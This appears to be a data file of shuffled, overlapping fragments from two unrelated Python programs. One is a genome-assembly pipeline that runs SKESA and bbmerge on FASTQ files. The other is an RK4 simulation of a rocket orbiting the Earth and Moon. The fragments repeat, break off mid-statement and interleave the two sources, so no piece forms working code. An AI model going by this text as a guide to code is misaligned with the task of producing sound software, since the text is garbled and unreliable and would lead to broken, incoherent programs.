Create a report with", "genomes \"\"\" with progressbar(self.metadata) as bar: for sample in bar: # Initialise the", "threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as log_file:", "pipeline try: status = sample.run.Description except AttributeError: status = 'unknown' if status ==", "with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\"", "== 2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq", "file to 'NA' as assembly is not desirable for metagenomes sample.general.assemblyfile = 'NA'", "except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile =", "= os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of the merged, and unmerged", "if not os.path.isfile(sample.general.mergedreads): # Run the merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0],", "Set the name of the report to store the metagenome file merging results", "0 # Open the log file with open(err_log, 'r') as error_log: # Extract", "log = os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): #", "= 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile):", "filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of", "sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = 
os.path.join(outpath, 'err')", "= 'NA' # Add the name and path of the filtered file to", "the filtered file to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile =", "stream num_reads, num_pairs = self.reads(error) # If the report doesn't exist, create it", "Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads}", "total number of reads, paired_reads, number of paired readds \"\"\" # Initialise variables", "with open(log, 'w') as log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except", "total=num_reads, paired=num_pairs)) # If the report exists, open it to determine which samples", "command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile,", "is a pure isolate, assemble it. 
Otherwise, run the pre-metagenome pipeline try: status", "re-running # the analysis else: lines = list() with open(report, 'r') as report_file:", "as log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general,", "from subprocess import CalledProcessError from click import progressbar import logging import shutil import", "lines.append(line.split(',')[0]) # Add the results to the report if sample.name not in lines:", "open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the", "exist, create it with the header and the results from the first sample", "path of the filtered file to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError:", "Set the name of the merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path,", "'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): #", "{contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use single read settings", "self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use bbmerge to merge", "files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = os.path.join(outpath,", "appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError:", "report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs from bbmerge", "Can only merge paired-end if 
len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath)", "'--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq", "report exists, open it to determine which samples have already been added -", "'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists, open", "skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\" with progressbar(self.metadata) as bar: for", "if status == 'metagenome': self.merge(sample) else: # Set the output directory sample.general.assembly_output =", "def merge(self, sample): \"\"\" Use bbmerge to merge paired FASTQ files for use", "well as the number of reads that could be paired :param err_log: bbmerge", "contigs.fasta output file from the assembler is present. 
If not, set the .bestassembly", "error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the merging command", "# If there are two fastq files if len(fastqfiles) == 2: # Set", "# Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr,", "If not, set the .bestassembly attribute to 'NA' \"\"\" for sample in self.metadata:", "size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just an empty file", "Merge path - keep all the merged FASTQ files in one directory merge_path", "{threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there", "try: status = sample.run.Description except AttributeError: status = 'unknown' if status == 'metagenome':", "# Add the results to the report if sample.name not in lines: with", "click import progressbar import logging import shutil import os __author__ = 'adamkoziol' class", "sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1 '", "\"\"\" # Set the assembly file to 'NA' as assembly is not desirable", "log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads')", ".format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files sample.general.assemblyfastq =", "line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads,", "out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) 
write_to_logfile(out, err, self.logfile, sample.general.logout,", "isolate, assemble it. Otherwise, run the pre-metagenome pipeline try: status = sample.run.Description except", "for line in report_file: lines.append(line.split(',')[0]) # Add the results to the report if", "report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists, open it to determine", "'--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use single read", "reads, and the number of reads that could be paired :param sample: metadata", "None) def merge(self, sample): \"\"\" Use bbmerge to merge paired FASTQ files for", "name of the report to store the metagenome file merging results report =", "AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA'", "# Set the the forward fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0]", "output file from the assembler is present. If not, set the .bestassembly attribute", "whether the contigs.fasta output file from the assembler is present. 
If not, set", "# Set the name of the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile):", "AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples", "None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use", "'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime", "olctools.accessoryFunctions.accessoryFunctions import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess import CalledProcessError", "= 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble", "out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err,", "'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus", "that could be paired from the bbmerge # err stream num_reads, num_pairs =", "sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self,", "the assembly command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample", "sample.general.logout, sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use bbmerge to merge paired", "in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of", "outputs the stats in the error file :return: num_reads, 
the total number of", "CalledProcessError from click import progressbar import logging import shutil import os __author__ =", "# If the report exists, open it to determine which samples have already", "Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None,", "sample if not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs))", "Ensure that the assembly isn't just an empty file if size == 0:", "progressbar import logging import shutil import os __author__ = 'adamkoziol' class Skesa(object): def", "write_to_logfile from genewrappers.biotools import bbtools from subprocess import CalledProcessError from click import progressbar", "'log') error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the merging", "metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except", "None, None) with open(log, 'w') as log_file: log_file.write(out) with open(error, 'w') as error_file:", "reads that could be paired from the bbmerge # err stream num_reads, num_pairs", "single read settings for the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores", "<filename>genemethods/assemblypipeline/skesa.py<gh_stars>1-10 #!/usr/bin/env python3 from olctools.accessoryFunctions.accessoryFunctions import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools", "the assembler is present. 
If not, set the .bestassembly attribute to 'NA' \"\"\"", "self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies')) make_path(os.path.join(self.path, 'raw_assemblies')) make_path(self.reportpath) logging.info('Assembling sequences')", "the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent", "- useful if re-running # the analysis else: lines = list() with open(report,", "# Set the name of the merged, and unmerged files sample.general.mergedreads = \\", "the total number of reads, as well as the number of reads that", "filtered file to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA'", "from click import progressbar import logging import shutil import os __author__ = 'adamkoziol'", "= 'unknown' if status == 'metagenome': self.merge(sample) else: # Set the output directory", "metagenomics pipelines. Create a report with the total number of reads, and the", "'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out", "populate the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile =", "= 0 # Open the log file with open(err_log, 'r') as error_log: #", "bbmerge to merge paired FASTQ files for use in metagenomics pipelines. Create a", "assemble genomes \"\"\" with progressbar(self.metadata) as bar: for sample in bar: # Initialise", "to merge paired FASTQ files for use in metagenomics pipelines. 
Create a report", "the name of the report to store the metagenome file merging results report", "self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as log_file: log_file.write(out) with open(error,", "the necessary information for line in error_log: if 'Pairs:' in line: num_reads =", "and the results from the first sample if not os.path.isfile(report): with open(report, 'w')", "the error file :return: num_reads, the total number of reads, paired_reads, number of", "as above, but use single read settings for the assembler else: sample.commands.assemble =", "os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number of reads, and the number of", "'r') as error_log: # Extract the necessary information for line in error_log: if", "open(log, 'w') as log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError,", "is present. If not, set the .bestassembly attribute to 'NA' \"\"\" for sample", "with the header and the results from the first sample if not os.path.isfile(report):", "total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs from bbmerge to extract", "with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report", "= os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq", "file :return: num_reads, the total number of reads, paired_reads, number of paired readds", "the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA'", "sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) 
sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output,", "number of reads, and the number of reads that could be paired from", "assembly file to 'NA' as assembly is not desirable for metagenomes sample.general.assemblyfile =", "forward = fastqfiles[0] gz = True if '.gz' in forward else False #", "file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number of", "paired :param err_log: bbmerge outputs the stats in the error file :return: num_reads,", "{threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile)", "'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip()", "os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files", "to determine which samples have already been added - useful if re-running #", "read settings for the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads}", "assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1", "else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output", "the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name", "list() with open(report, 'r') as report_file: for line in report_file: lines.append(line.split(',')[0]) # Add", "merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total 
number of reads,", "for line in error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:'", "open it to determine which samples have already been added - useful if", "make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles =", "__author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run", "import bbtools from subprocess import CalledProcessError from click import progressbar import logging import", "the forward fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz = True", "files in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name", "best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file from the assembler is present.", "the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA'", "--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq files, populate", "the metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total", "number of reads that could be paired :param sample: metadata sample object flagged", "= sample.run.Description except AttributeError: status = 'unknown' if status == 'metagenome': self.merge(sample) else:", "sample.name not in lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs))", "path - keep all the merged FASTQ files in one 
directory merge_path =", "of the filtered file to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile", "merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log')", "== 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile", "report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs from", "assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out,", "as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists, open it", "create it with the header and the results from the first sample if", "total number of reads, and the number of reads that could be paired", "= bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None)", "= line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def", "Extract the necessary information for line in error_log: if 'Pairs:' in line: num_reads", "write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use bbmerge", "mix=True, returncmd=True, 
threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w')", "= list() with open(report, 'r') as report_file: for line in report_file: lines.append(line.split(',')[0]) #", ".format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists, open it to determine which", "paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta", "keep all the merged FASTQ files in one directory merge_path = os.path.join(self.path, 'merged_reads')", "could be paired :param err_log: bbmerge outputs the stats in the error file", "str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure isolate, assemble", "from the bbmerge # err stream num_reads, num_pairs = self.reads(error) # If the", "Add the results to the report if sample.name not in lines: with open(report,", "# Initialise variables num_reads = 0 paired_reads = 0 # Open the log", "num_reads, num_pairs = self.reads(error) # If the report doesn't exist, create it with", "unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that", "sample in self.metadata: try: # Set the name of the filtered assembly file", "metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def", "= 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa", "'--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as", "use in metagenomics pipelines. 
Create a report with the total number of reads,", "reads that could be paired :param sample: metadata sample object flagged as a", "None) with open(log, 'w') as log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err)", "the merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath,", "sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files sample.general.assemblyfastq = fastqfiles forward =", "= \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try:", "but use single read settings for the assembler else: sample.commands.assemble = 'skesa --fastq", "sample.general.logerr, None, None) with open(log, 'w') as log_file: log_file.write(out) with open(error, 'w') as", "if sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure isolate, assemble it. Otherwise,", "# If the sample is a pure isolate, assemble it. 
Otherwise, run the", "# the analysis else: lines = list() with open(report, 'r') as report_file: for", "the number of reads that could be paired :param err_log: bbmerge outputs the", ":param sample: metadata sample object flagged as a metagenome \"\"\" # Set the", "\\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same", "bbmerge to extract the total number of reads, as well as the number", "the assembly isn't just an empty file if size == 0: sample.general.bestassemblyfile =", "error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name of the", "the analysis else: lines = list() with open(report, 'r') as report_file: for line", "the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} '", "outputs from bbmerge to extract the total number of reads, as well as", "inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies')) make_path(os.path.join(self.path,", "--cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If", "https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1", "os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just an empty", "in report_file: lines.append(line.split(',')[0]) # Add the results to the report if sample.name not", "sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = 
sample.general.trimmedcorrectedfastqfiles # Set the the forward", "that the assembly isn't just an empty file if size == 0: sample.general.bestassemblyfile", "first sample if not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads,", "= os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles #", "sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA'", "'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the" ]
[ "= PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket", "'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan')", "k4vy = F6(x[i] + h * k3x, y[i] + h * k3y) x[i+1]", "F3(x[i] + h * k1x * 0.5, y[i] + h * k1y *", "-*- \"\"\" Created on Wed Mar 4 10:37:05 2020 @author: Alex \"\"\" import", "def F4(x,y): return -1 * (Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt", "* k3y) x[i+1] = x[i] + (h/6) * (k1x + 2 * k2x", "energy is the sum of these two # Part A RK4 Implementation for", "= (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <= rE : print(\"\"\"", "y axis (units are in m/s) (If the previously reccommended altitude is set", "G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me * y *", "utf-8 -*- \"\"\" Created on Wed Mar 4 10:37:05 2020 @author: Alex \"\"\"", "position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color =", "Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal", "of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label =", "h * k3vy) k4vx = F3(x[i] + h * k3x, y[i] + h", "* k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F3(x[i] +", "ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color", "print(''' Calculating orbit... ''') x[0] = x0 y[0] = y0 vx[0] = vx0", "return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me *", "with x = 0, y = 7500)\"\"\") vx0 = input(\"Vx = \") vy0", "/ (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome to", "input(\"Vy = \") print(''' Calculating orbit... 
''') h = 1 N=int(t1-t0/h) x, y,", "(k1vx + 2 * k2vx + 2 * k3vx +k4vx) vy[i+1] = vy[i]", "= Ek[0]+Ep[0] #Total energy is the sum of these two # Part B", "#3 k3x = F1(vx[i] + h * 0.5 * k2vx) k3y = F2(vy[i]", "k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx = F3(x[i] +", "Altitude above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots()", "m/s) (If the previously reccommended altitude is set then start with x =", "k2y + 2 * k3y + k4y) vx[i+1] = vx[i] + (h/6) *", "6.674e-11 Me = 5.972e24 #mass of the Earth (kg) rE = 6.371e6 #radius", "axis\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating", "''') x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0", "k3x, y[i] + h * k3y) k4vy = F6(x[i] + h * k3x,", "= F1(vx[i] + h * k3vx) k4y = F2(vy[i] + h * k3vy)", "# -*- coding: utf-8 -*- \"\"\" Created on Wed Mar 4 10:37:05 2020", "range (0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i])", "the rocket (kg) rM = 1.737e6 #radius of the moon (m) d =", "ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 =", "= F2(vy[i] + h * 0.5 * k2vy) k3vx = F5(x[i] + h", "= 'teal') moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 =", "= np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational", "(Me * y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1", "set then start with x = 0, y = 7500)\"\"\") vx0 = input(\"Vx", "#radius of earth (m) Mm = 7.348e22 #mass of the Moon (kg) Mr", "= F6(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx) k2y", "F6(x[i] + h * k2x * 0.5, y[i] + h * k2y *", "'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan')", "is the sum of these two # Part B RK4 Implementation for i", "x * G) / 
(((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me *", "#mass of the Earth (kg) rE = 6.371e6 #radius of earth (m) Mm", "7.348e22 #mass of the Moon (kg) Mr = 5e3 #mass of the rocket", "G = 6.674e-11 Me = 5.972e24 #mass of the Earth (kg) rE =", "k1y * 0.5) #3 k3x = F1(vx[i] + h * 0.5 * k2vx)", "* k3y) k4vy = F6(x[i] + h * k3x, y[i] + h *", "* (Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the", "print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1", "x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 r = np.hypot(x,y)", "2 * k2x + 2 * k3x + k4x) y[i+1] = y[i] +", "k3y) k4vy = F4(x[i] + h * k3x, y[i] + h * k3y)", "= F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x", "apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)')", "potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum of these", "the sum of these two # Part B RK4 Implementation for i in", "N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = 